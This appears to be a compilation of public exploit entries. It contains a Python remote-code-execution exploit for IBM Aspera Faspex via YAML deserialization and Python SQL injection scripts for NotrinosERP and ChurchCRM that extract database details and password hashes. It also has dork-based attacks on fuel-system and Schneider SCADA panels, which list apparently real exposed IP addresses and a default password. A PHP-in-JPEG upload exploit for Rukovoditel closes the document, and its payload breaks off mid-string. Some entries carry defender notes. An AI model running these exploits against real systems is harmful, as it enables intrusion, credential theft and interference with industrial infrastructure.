
# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
# Date: 02/02/2023
# Exploit Author: Maurice Lambert <[email protected]>
# Vendor Homepage: https://www.ibm.com/
# Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex
# Version: 4.4.1
# Tested on: Linux
# CVE : CVE-2022-47986

"""
Proof of concept for CVE-2022-47986, a YAML deserialization flaw in
IBM Aspera Faspex (before 4.4.2) that leads to remote code execution.

Defender notes, taken from the single request this script builds:

- One HTTP POST to ``<base>/aspera/faspex/package_relay/relay_package``
  with a JSON body whose ``external_emails`` field carries a YAML document
  made of ``!ruby/object:`` and ``!ruby/module`` tags.  Such tags never
  belong in an e-mail list, so their presence in a JSON body to this path
  is a practical WAF/IDS signature.
- Several body values are constant fingerprints of this PoC
  ("assetnote_pack", "hello from assetnote team", the repeated UUID
  ``d7cb6601-6db9-43aa-8e6b-dfb4768647ec``).
- Mitigation is upgrading to Faspex 4.4.2 or later, per the header above.
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "[email protected]"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "[email protected]"
__description__ = """ This file implements a POC for CVE-2022-47986 an YAML deserialization that causes a RCE in IBM Aspera Faspex (before 4.4.2). """
# NOTE: `license` and `copyright` shadow the `site` builtins of the same
# name for the rest of this module.
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/CVE-2022-47986"
copyright = """ CVE-2022-47986 Copyright (C) 2023 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. """
__license__ = license
__copyright__ = copyright
__all__ = []

# Import-time side effect: the notice is printed whenever the module is
# loaded, not only when it is run as a script.
print(copyright)

from urllib.request import urlopen, Request
from sys import argv, exit, stderr, stdout
from shutil import copyfileobj
from json import dumps


def main() -> int:
    """Send the crafted relay_package request and copy the response to stdout.

    Command-line contract: ``argv[1]`` is the Faspex base URL (scheme and
    host, no trailing slash — it is concatenated verbatim) and ``argv[2]``
    is the string interpolated into the YAML document.

    Returns:
        1 when the argument count is wrong (usage text goes to stderr),
        0 after the raw response body has been written to ``stdout.buffer``.

    Raises:
        Whatever ``urlopen`` raises on connection or HTTP failures
        (``URLError`` / ``HTTPError``); nothing is caught here, so a
        patched server answering with an error status surfaces as a
        traceback rather than a message.
    """
    if len(argv) != 3:
        print("USAGES:", argv[0], "[hostname] [command]", file=stderr)
        return 1
    copyfileobj(
        urlopen(
            Request(
                # Vulnerable endpoint; no path normalisation is done on argv[1].
                argv[1] + "/aspera/faspex/package_relay/relay_package",
                method="POST",
                data=dumps({
                    "package_file_list": [ "/" ],
                    # The YAML gadget chain is an f-string: argv[2] is placed
                    # unescaped inside the `newline:` value, and `{{}}` is
                    # the f-string escape for a literal `{}`.
                    "external_emails": f""" --- - !ruby/object:Gem::Installer i: x - !ruby/object:Gem::SpecFetcher i: y - !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::Package::TarReader io: &1 !ruby/object:Net::BufferedIO io: &1 !ruby/object:Gem::Package::TarReader::Entry read: 0 header: "pew" debug_output: &1 !ruby/object:Net::WriteAdapter socket: &1 !ruby/object:PrettyPrint output: !ruby/object:Net::WriteAdapter socket: &1 !ruby/module "Kernel" method_id: :eval newline: "throw `{argv[2]}`" buffer: {{}} group_stack: - !ruby/object:PrettyPrint::Group break: true method_id: :breakable """,
                    # Remaining fields are fixed filler values; they are the
                    # same on every run and therefore easy to match in logs.
                    "package_name": "assetnote_pack",
                    "package_note": "hello from assetnote team",
                    "original_sender_name": "assetnote",
                    "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
                    "metadata_human_readable": "Yes",
                    "forward": "pew",
                    "metadata_json": '{}',
                    "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
                    "delivery_sender_name": "assetnote",
                    "delivery_title": "TEST",
                    "delivery_note": "TEST",
                    "delete_after_download": True,
                    "delete_after_download_condition": "IDK",
                }).encode()
            )
        ),
        # Raw bytes are relayed unchanged; nothing is decoded or parsed.
        stdout.buffer,
    )
    return 0


if __name__ == "__main__":
    exit(main())
# Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection
# Date: 11-03-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md
# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7
# Vendor Homepage: https://notrinos.com/
# Version: 0.7
# Tested on: Windows, Linux
# CVE: CVE-2023-24788

"""
The endpoint /sales/customer_delivery.php is vulnerable to Authenticated
Blind SQL Injection (time-based) via the GET parameter OrderNumber.  The
endpoint is reachable through the menu Sales - Sales Order Entry - Place
Order - Make Delivery Against This Order.  The OrderNumber parameter
requires a valid order number value.

This script is a proof of concept that retrieves the database name and
version through the blind SQL injection discovered in the application.

Defender notes (from the requests built below):
- Every character position is probed with up to 94 separate GETs, each
  carrying ``UNION SELECT IF(...,SLEEP(2),null)-- -`` in ``OrderNumber``;
  the request volume and the 2-second latency spikes are visible in
  access logs and APM data.
- The session cookie name ``Notrinos2938c152fda6be29ce4d5ac3a638a781`` is
  hard-coded, so the PoC only works against an instance using that exact
  cookie name.
- Server-side fix: bind ``OrderNumber`` as an integer parameter instead of
  interpolating it into the query.
"""

import sys, requests


def injection(target, inj_str, session_cookies):
    """Probe one character position and return the matching ASCII code.

    Args:
        target: base URL of the application.
        inj_str: injection template containing the literal ``[CHAR]``
            placeholder that is replaced by each candidate code point.
        session_cookies: value of the session cookie.

    Returns:
        The candidate ``j`` (32..125) whose request took longer than two
        seconds, or ``None`` when no candidate did.

    Note: ``username``, ``password`` and the re-login path rely on module
    globals assigned under ``__main__`` — this function is not usable
    stand-alone.
    """
    for j in range(32, 126):
        url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))
        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}
        r = requests.get(url, headers=headers)
        res = r.text
        # The login page title in the body means the session expired;
        # re-authenticate (module globals) and re-issue the same request.
        if "NotrinosERP 0.7 - Login" in res:
            session_cookies = login(target, username, password)
            headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}
            r = requests.get(url, headers=headers)
        # Time-based oracle: SLEEP(2) fires only when the guessed code matches.
        elif (r.elapsed.total_seconds() > 2):
            return j
    return None


def login(target, username, password):
    """POST the login form and return the session cookie value.

    Returns ``None`` when the cookie was not set (e.g. bad credentials).
    The form body is built by plain string formatting, so credentials
    containing ``&``, ``=`` or ``%`` are not URL-encoded.
    """
    target = "%s/index.php" % (target)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)
    s = requests.session()
    r = s.post(target, data = data, headers = headers)
    return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')


def retrieveDBName(session_cookies):
    """Recover DATABASE() one character at a time and print it.

    Reads the module global ``target``.  Stops at the first position for
    which ``injection`` returns ``None`` (or at 99 characters).
    """
    db_name = ""
    print("(+) Retrieving database name")
    for i in range (1,100):
        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
        retrieved_value = injection(target, injection_str, session_cookies)
        if (retrieved_value):
            db_name += chr(retrieved_value)
        else:
            break
    print("Database Name: "+db_name)


def retrieveDBVersion(session_cookies):
    """Recover @@version one character at a time and print it.

    Same loop as ``retrieveDBName``; reads the module global ``target``.
    """
    db_version = ""
    print("(+) Retrieving database version")
    for i in range (1,100):
        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
        retrieved_value = injection(target, injection_str, session_cookies)
        if (retrieved_value):
            db_version += chr(retrieved_value)
            sys.stdout.flush()
        else:
            break
    print("Database Version: "+db_version)


def main():
    """Log in with the module-global credentials, then run both extractions."""
    print("(!) Login to the target application")
    session_cookies = login(target, username, password)
    print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")
    retrieveDBName(session_cookies)
    print("")
    retrieveDBVersion(session_cookies)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("(!) Usage: python3 exploit.py <URL> <username> <password>")
        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")
        sys.exit(-1)
    # These globals are read by injection(), retrieveDBName(), retrieveDBVersion() and main().
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    main()
# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection
# Date: 11-03-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.1
# Tested on: Windows, Linux
# CVE: CVE-2023-24787

"""
The endpoint /EventAttendance.php is vulnerable to Authenticated SQL
Injection (union-based and blind) via the Event GET parameter.  The
endpoint is reachable through the menu Events - Event Attendance Reports -
Church Service/Sunday School.  The Event parameter is taken directly from
the query string and passed into the SQL query without sanitization or
escaping, which lets an authenticated user inject SQL into the query.

This script is a proof of concept that retrieves the username and
password hash from the user_usr table.

Defender notes (from the single request built below):
- The ``Event`` value ``2 UNION ALL SELECT ... from user_usr-- -`` and the
  marker string ``Perseverance`` in the response are straightforward
  signatures; the cookie name ``CRM-2c90cf299230a50dab55aee824ed9b08`` is
  hard-coded.
- Server-side fix: cast/bind ``Event`` as an integer before it reaches
  the query.
"""

import sys, requests


def dumpUserTable(target, session_cookies):
    """Issue one UNION-based request and print the rows it leaks.

    The injected SELECT prefixes each ``username:hash`` pair with the
    marker ``Perseverance`` so the values can be picked out of the HTML
    table; every ``<td >Perseverance...</td>`` cell is printed.  The
    ``Type`` value ``Sunday School`` contains a literal space that is left
    to ``requests`` to encode.  Returns ``None``.
    """
    print("(+) Retrieving username and password")
    print("")
    url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)
    headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}
    r = requests.get(url, headers=headers)
    lines = r.text.splitlines()
    for line in lines:
        if "<td >Perseverance" in line:
            print(line.split("Perseverance")[1].split("</td>")[0])


def login(target, username, password):
    """POST the login form to /session/begin and return the session cookie.

    Returns ``None`` when the cookie was not set.  The form body is built
    by string formatting, so credentials are not URL-encoded.
    """
    target = "%s/session/begin" % (target)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = "User=%s&Password=%s" % (username, password)
    s = requests.session()
    r = s.post(target, data = data, headers = headers)
    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')


def main():
    """Log in with the module-global credentials and run the dump."""
    print("(!) Login to the target application")
    session_cookies = login(target, username, password)
    print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")
    dumpUserTable(target, session_cookies)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("(!) Usage: python3 exploit.py <URL> <username> <password>")
        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")
        sys.exit(-1)
    # Module globals read by main().
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    main()
  4. # Exploit Title: Franklin Fueling Systems TS-550 - Exploit and Default Password # Date: 3/11/2023 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/) # Version: TS-550 # Tested on: Linux/Android(termux) Step 1 : attacker can using these dorks and access to find the panel inurl:"relay_status.html" inurl:"fms_compliance.html" inurl:"fms_alarms.html" inurl:"system_status.html" inurl:"system_reports.html' inurl:"tank_status.html" inurl:"sensor_status.html" inurl:"tank_control.html" inurl:"fms_reports.html" inurl:"correction_table.html" Step 2 : attacker can send request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi Step 3 : if get response that show like this <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> Step 4 : attacker can crack the hashesh using john the ripper notice : most of the panels password is : admin Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
  5. # Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication # Google Dork: inurl:/scada-vis # Date: 3/11/2023 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: https://www.se.com/ # Version: all-versions # Tested on: Windows/Linux/Android # Attacker can using these dorks and access to the panel without password inurl:/cgi-bin/scada-vis/ inurl:/scada-vis/schedulers inurl:/cgi-bin/scada-vis/index.cgi inurl:/scada-vis inurl:/cgi-bin/scada-vis/touch.html POC : http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi # Attacker can these this dork for bruteforce the panel inurl:/scada-vis/pin?return=index POC : http://143.176.129.1/scada-vis/pin?return=index http://62.163.74.206/scada-vis/pin?return=touch
  6. Exploit Title: Rukovoditel 3.3.1 - Remote Code Execution (RCE) Version: 3.3.1 Bugs: rce via jpeg file upload Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 12-03-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== #First of all, we need to inject the php codes into the metadata of any jpeg file with exiftool. (for example) exiftool -overwrite_original -comment="<?php system('id'); ?>" index.jpeg exiftool -overwrite_original -DocumentName="<?php phpinfo(); ?>" index.jpeg #after that we need to get the base64 code of the image (i used this site) https://h3yy0.csb.app/ #and we have to do url encoding #now we have to upload profile photo Poc request (I changed the file name to hello.php and and pasted our base 64 code) POST /index.php?module=users/photo&action=save&token=34GtgxfEmO HTTP/1.1 Host: localhost Content-Length: 9567 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/index.php?module=users/account Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cookie_test=please_accept_for_session; sid=0d3esjp74uo3q3gp38r044vc9h; sidebar_closed=1 Connection: close 
img=data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4QB4RXhpZgAATU0AKgAAAAgABQENAAIAAAAWAAAASgEaAAUAAAABAAAAYAEbAAUAAAABAAAAaAEoAAMAAAABAAEAAAITAAMAAAABAAEAAAAAAAA8P3BocCBlY2hvICdzYWxhbScgPz4AAAAAAQAAAAEAAAABAAAAAf%2F%2BABU8P3BocCBwaHBpbmZvKCk7ID8%2B%2F9sAhAAJBgcSEhIVExMTFRUVFRYXFxUVFhUVFhgWFhUVFhYVFRUVGB0oIBgaJR0VFSExISUpKy4uLhcfMzgzLTcoLS4rAQoKCg4NDhoQEBstJR8lLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS3%2FwAARCAEqAKkDASIAAhEBAxEB%2F8QAGwAAAgMBAQEAAAAAAAAAAAAABAUCAwYBBwD%2FxAA8EAABAwIEAwYFAgUDBAMAAAABAAIRAyEEEjFBBVFhBiJxgZGhE7HB0fAy4RQjQlJiB3LxFVOCkhYz0v%2FEABkBAAMBAQEAAAAAAAAAAAAAAAECAwQABf%2FEACMRAAICAwEBAAICAwAAAAAAAAABAhEDITESQSJRE3EEMmH%2F2gAMAwEAAhEDEQA%2FAMhSCvYFVSaiWNWA2k2IqmFQxqJphBjIuYFcxqqar6YU2URYwK0NX1MKxKxkVOCFrBGuCFroBFWJSPHp5iSkePKrAnPhn8UhgisUhVsjwxS6fFRcplQcmQpWVxi6V1iYAVRCMphC0AjaYUpDom0KUL4BSShHdFFMQlNXscos0BLArmIdhV7CgFBNMIqmxDUkXSSMoi5rVbCraFNIxkQqIDEFGVXJfiCgEW4pyRY5yc4spFjSq4yWQT4hDq%2BsqFsXDEzpUCplQKZAKypUwolTpJgBtAIxgQtAIxgUWOiYCkvgF2EoRswq1qrYrmBSNBbTKJpqhgRNMJWFF9IIukEPSCJppGUQS0LjwuNXXJRkDVSgayPqIGuuCKsWkWNT7FpFjVXGRyCeqqSr6qoK2Ixs%2BUSpKLkUAqKtpBVlXUQiwINoBGMCGoBFtCkyiJBdhdC%2BSnDemiGBDsRFNRNBewIhiopq9oQYyCKaKpCUJTCYUWhoBO%2Bg%2BvgkodFnwiBOyi5dGOI0Fuu%2BiJyNfZtn8v6b6X2XOP6G2uiyqga6YVxFjql2IKUIrxZSPGJ1i3JJiyrYyOQVVkO5E1UO5a0Y2cUSpqLkUAqKIohUImgEWBB1AItoQ1AIpoUWURJfKQC%2BylA4bU1cxUMKuYVE0BNNEU0KwoikUGMg2gyfAXPgrcRVJv8AkbBcayAG8wHO8%2F0j6%2BaBxmLuYS1bovDSsJa46%2Fn5ZMcI0Nk7xcCJ8JSDDYq48dFsMNTytBy5Z1dmHzta0W5rTHHojPJQDjaeemH6uaBmkQSJgEjnokGIC1mJGQjdryQZtqI5m%2F5ssxj6Ra4tOxj91myKpDxdoR4wJLignWLSbEp8ZLILKqHciqg1Qz1qRkZEKJXVwpgEAiqAQ7GE7J5wjg1SpBIyt5nfwG6EmGKb4Qw7Z0Wt4B2PrVyC4FjT%2FwC0fRabsh2PY0B7h4E6nr0W6%2BG1ggAKDlfC6xpdMxg%2ByOHo3LQTzN%2Fmiv4DD%2F2N9ArOLYsCBE5vy6F%2BC78Kk3bNChS3o80arWKDArmBMSLWImkEOwImiLhKEN4jVyueOsDwFh8knxZBumPG3RUd4yPO%2FwBVnMXioF0yjtmi7ii2li8jpWx4Bxb4gykw7WMhqA%2FXSNF50yuC4X3%2FACStnwfE0gA2mXPdF%2FhkwP8AyJv42C1QRmymmxp7plvgQ076TMTe6Q46iajQ4fqbZw6bHy09ETVxThIdL7Gx29CSleHxZD80WM5m8wb
O9ZlZ8sdjYnoDrcIqOmIS%2FF9na2wB81r3jK8NFxFp3B0KhVfJndGMa4JJ30wFbs%2FXE9wqqh2crvdlyGSJE9F6EcWGgjddxGJjK5pgxrsqJknBGOZ2HqhhLjDpAA%2BcrlLsqxpPxX2GwTrGceeJB1Wfo4t9V8CSSYHqklNlIYl9HGHFMRTpUxOgMSfFbfs72ciKlW51A%2B6H7K9nxT77oc%2F5dAtc2dlFS9F2lHgSx0aQqsc4ZC7yI%2FPy6Ar1BeLHzS%2BrxJ4BaTM9U%2F8AIoqmCOFt2gPG4oMFWsb%2FAAmy3q42bPnHovPf%2Bt4n%2FuuWi7b4rJTpUQYL%2FwCZU8JhgPuVjYRxxpEf8ifqf9DVhVzSh2K1pShCWFGYJsuA5lAsRuHOVwifwLvoxXTpZy8uJysFiTvoB8lj%2BMVxnMGwWp4szLRYN3Brj5idPArHYtsPE3Gn2VYr4P6%2Bjbs%2FwxtbvPIa3rv4D6rWMxNGk0MpjSLC2m7haVluH4ZzZOWzhEGQJEEB0XjWyfMqOs0tjLAd3ctzoZ0ynQEclZaM0nbLzWLgY535np4IOuCDOm33Tvh2EDiJ7rh%2Btuo6OHQ3XOJcPgdPlp9VLJwbHLZRWr5zTI5RPgNlB7h8R7TItIPKRKpwlKInY36QHTPomGMDXUnP2gt87%2FQhSjKiskAurTGYXiD%2BeqXY6o6iCDdp9p0PoQp06hhoPJve%2BR%2Bc9Aqs09xxmC5hB%2Ftgwm9C0KsnxJMnaPBc7JvLcSwRuZ80x4ZhmuDmaFs%2BcbfNNMHwkBwezUjRSnLVFILZvsA0QIPzRxa78ulfB2d2%2FJGGoWAmDHqhi4Ge2DcQxDmiImdOfql%2FD8Nmcc2ky48gLm6YDHseQMw1u0iEk%2F1AxJosLKboDyAYtaJKMoqT%2FwCD%2B3jg9bMNx7HGtXqP2LiG9GizQPJLoUiFyFc84ZtVjVUCptUzQE0dUZkJe07BB4YSUfmRSs6xZ2jxUv8AID2Snh%2BDNV8TA8BcHWAdUXxDCPqP%2Bf7lMcDhPhiD5J72df40MMLhW5cpAkWI52gEctijsPYlp7wI7s8jEtPT88A6T9Drt7osFG7J0X0AAQRb80K5iq8gjxHqNl83QIV93X5%2BxsfeChJ6pjRX0WYqq5shsmYA6g5QYHt6q11eKFSmYBDh7getw72VtOO5a9p6ET%2F%2BVXWw4NzoSHR07zr%2BsJFEpYFw2kXYeSNHFt%2BQdb3EeapxlGHtcLjfmRpJ8reStocRyVfhx3bevdd6zKKxjJLdg5pHnAc0%2B8IPQVsAxWHdSxIqCcj4vyJABB8fqthgoLmiJEfMD7FLa9djKbA%2B%2BYWnmIP2THAPhwgzYX6H%2Fg%2BqlPY8TS4BgIBj82RteiHiNuiowzIty%2B10a1yC0hW9ifFcMZT73t91lP8AU%2BoIoN%2FqcC4%2BwC2%2BIMvaOsn7LzDt%2FXc%2FFunQABvQDknx9FytuOzNLikuK5lGIVjQoBWNKmaA7h9GTPJEuYQvsGMrR1XcQ9E4pdIQ76hJ%2FPmu1H9ZVbKU8vzkdkAltOqR9fumuCOa2qW0KAP0kX9d05wbYCZAZe0QIQVZ0GdPzRFvJOirfh51XM5I%2BwNBrjprBBG17%2FMoTizfhSIs6b9M7XT7lEYQPpOtBHK3nBV%2Fal7X0Wm1nRP%2B5swfzZcn%2BJzX5IUcR4WKlJ1Zgu2XjqWy75W9EMaxNKm8%2FwBAg9CCNfULQ9kW56UO3%2BRMGfRKuM4AsFfZs%2FEbyyklnyLUJbVhi90U8c71TDU9QWyPIAfJo9Vp8LhhTLfAfQfRZPgwdUrYcn%2BhnvafcStpxxuSmx4mxA8Z%2FwCR6JWtDXuh1h%2F0g87%2FAGRLXSEPg%2B%2FRkakeiswtPKLlJKL%2BHJkKreaw3%2BouAPcqgCNCd
1vHtk6FKu1WCz4WoInKJHklhakdPcTx5fLpXFqMg8%2FhlKnRuE2NBVmnCUqiis8NCHrVSfz2Usc09UtfiHN6hcOE1JOinh6bvuVU3GsIuYI5i6ErY92bue6NIGzQ4Yhv5KPbWA3CyNKvWcYhN8Lw9x1cUrGSHT8fSZ%2Bp%2BX83Vdfi1Bl8r3E7kEeFiRHqhW020qlJ7mh4ZUu0%2FwBXddYyOcJFx%2BsRSqO1cAcvibSEXukmdajbaHv%2FAMloudDpadJiI%2Bf2XeNvNSmWNIMnNaYBymSPH6pLjeGNfh3VDYtygbXIM%2FIJd2X4o8PFN5JABif7QYA%2BaXy2hlOJt%2BzLXNbF7WPOdIHXXy8UZ2ieH06otGXJ5Dl5%2FJLaeIygHwP7np08FKpWmmZN5%2FYT5R6ITTSo6FN2JOzlU52nkI00IsfZekcTp%2FEoOtNrdSPxywXZzAuJcRp6zAXpLyKNJpcL2DRzPKErl0PnaYPwkFmHaCIJvHIbSiMPXboXjwkD2WW41xCpLJJDTUY2GyP1FMuJ06VFrKgAD2lgJ3cHnK4HncyPBNCMpKxJTgpV9NFlnr6pJ22xPwsK8yQXDKI6pkys9sQJEXMLJ%2F6p4r%2BXTaP6jJ8gjFbFk3R5qSuL5cVCB6GWKjEU0UFViSIU7NFC2sbGUlc9odGx629wn8SlHEsFFwmujkidPANqiY0RdDhrabbjXmgOH4ks1kjxTl%2BNYRsTvJsCntC00L8Y3Ldo8VfwrHgWIA8QVCpUDiIcAdov5IXFU4u4R129UskNF%2FB7jqAqMJaYNvCQbRsstXrtnLVEGbg6Eg2g%2BSYYbEuaCWvA5zp6KOMqtqznYPEW9Cp2U82KOPdqAafwqelpaLy6ILiefRK%2BBUnPc1%2Bwt7%2FuiMfw5oMga9VdgKnw2kbk%2FVXh5rRGSdmxcO59EPVqQ2Jv%2B1lfTdmY2%2ByoqMlw%2FwBwHvF%2FVDLw7D003Y%2FC38b%2B8pp2p4m1mIpMeQGw6JtJso9mGBoAkTb2S%2FttgW4lxBaHZdDu3S4KhSrZbstEcbUohzTUcA1rg%2FSZLdAs7j%2BOfxuIbSpAhucF5mRDTLWjzufAJJiuEhrodUdG0l59pWj4F8KiIo0yXf3ER6IuajGrBHF%2BVnoeEqWvy%2BQXmvb%2BoXVYvDRZbnhLXuEuEDX8KwXaum19V2U94f0nXy5roNy2JkSjoyJXy7UEG6iqmdm%2BOIsg6teUsoYrNurwSNUtFxhhWyr69C0FA4GtBTSmZ3QCIshabiyn%2FwBKbUBLbHknNXDg2P55qgUiwjK0HrAXa%2Bj7fBGzhmR2pBHNMalF20TyIsU4o0w8S8eBghTfw0HT13VFC%2BEpTrplK1BzdW%2B0geaGq1cojbY6eX%2FK1fEuEtiRr4rN43BfDEkAnly%2B6nLHJMpDLFoUYhzrDblM%2BaGyknfX66lM6PDnv70fuunBx49E6VCt2w3C1YZAPmmGFINjrt4i8pPSadDa6OwtM6ei6QYm14XLWg7qyu4io5w%2FqbInnyQfCHFxDfD8%2BSauwjnCwUZ9RSP0wFSm6pVOaxm%2B0eHVang%2FDTtpyn8lEN4J3jAvvoneDwIbEgSOUqLTkyvpJFePr%2FBoujYaryPidfM8md16F264gGMyc15fXqSVpiZJs6a4dZ%2Fk7fz5qPwf8h6qhfKlkKGXDaZiUZ8UjRWYamAwQoVKKmzSi7C1ATJt1H2TfDVpsNOv3SLDsM2Gm50CZ03gbyUQDoNkXI9VV8CqD08QLeahQNiZjwt76oqizNE6bn9yj5TO9NEsO2%2F6gOYufoneDa076pc7DgHXyGvmrMO%2FIYA99PS6eE%2FDEnD2i%2FiWG7pWYxXDabhd5BJ3%2BQlbppD2%2FSPukHFsI4WcyRzkg%2Bg1VslPaI47TpmPr4dzM2UhzRo2fC0
LlAjuh4yudoLz6lNMRgACSx5Y4i%2BaR4QFfhsHVEEhj7ad2T6eCgumhrQrrYbK5rnjubuFi0%2F5Dl1RNMtL%2B5BHiD8lpv4MOblLRJ1vYTsk2H4O3CudAEPIItqTIDfdLm0tFf8AHpvYz4G0ioDl3WwxTAxo1naNboPs9gAA17rnl15pxjGOcRAA%2FwAje3glxxl4uXRc04udR4AsoODC6Lu238lEHKLj1RGNrBoA1jUyR5SLDzQb8Q46OPg4AjyK5pIVNsyfbzCFzM4JtyK8xqF3Mnx%2By9n7SMaaLg9pFtW39ivI8bw17Zcwioz%2B5u3%2B5uoTRuicwAv8PQKMrhXyYQ01CS0fJfPbHX5eu67g7Nj3O6JaxsXueSSi9i7MSYnwA%2BgCNw7I1t81XWa7%2Bnujpb1OpUcOQ3aT6D7n2XI5jQPAFvMxMesAJhwwtIzEl52E2CQ4hznw39gOvII%2Fh%2BLFOwvtO3kmToDVmhY4umwHlr66rhbDe873t4QNUFWxQYwvefAX8kLwh1Su%2FM6Q1tmjSSflCbTArQ9wpJuCbXnT0G3mranFmhzabpJPLbzXKzxTZA13PU6BZ3D1C7EPB1AbpsBf1v6eJU3Ly9DqPpbNZU4c0iRBB5j6hDN4fTBGgjaYAR1fE%2FDp5heIt05DqrcOGYhoc0CTqFVeX%2FZJuS%2FoEaWC5cD0aCpvomqWkAw3SfqjmcMDdtdUVUeykOsbJXFjKa%2BFmApwLnRdxWPa02hx2k2H2WM4n2myOLXtI5EeyqPFQ6C07D0%2FSVOWVRVDxwuWzQOqPkmd7h0kCeY1b4gkdAradGbjuncatd1EWKXYOu53Uj3CbsMAcjtyPQqSkpdHlFxBOMUyabhOUxvcH1XkWJxfw3uBpw4G%2BUlvnuvZsdem7wO30%2Bi8c4%2FTBcTo4HyLToQdwrwf6ITX7BKmIo1P1Nc0%2FwBwA9wPoq%2F4aj%2F3x%2F6O%2ByCXE9kqNSTYRb5r5rjsiH0e4DOyXvnqpvTNC2hi0tdqZKhXwp12UcM8MufRdxOKLrgfZMKU%2FEkQPT7lfNxTaQzEgu2b9Y%2BSFpYeo8kzlaNY3jZSwlFgqZn338Tt5Lq%2FYb%2FQZh6hd%2FMrWAuxvXnC0fB8U1jLfqJ9AVnq1I1CMo7uwO%2F7JhkcBDbaT5LnaOVM0GFpmo8O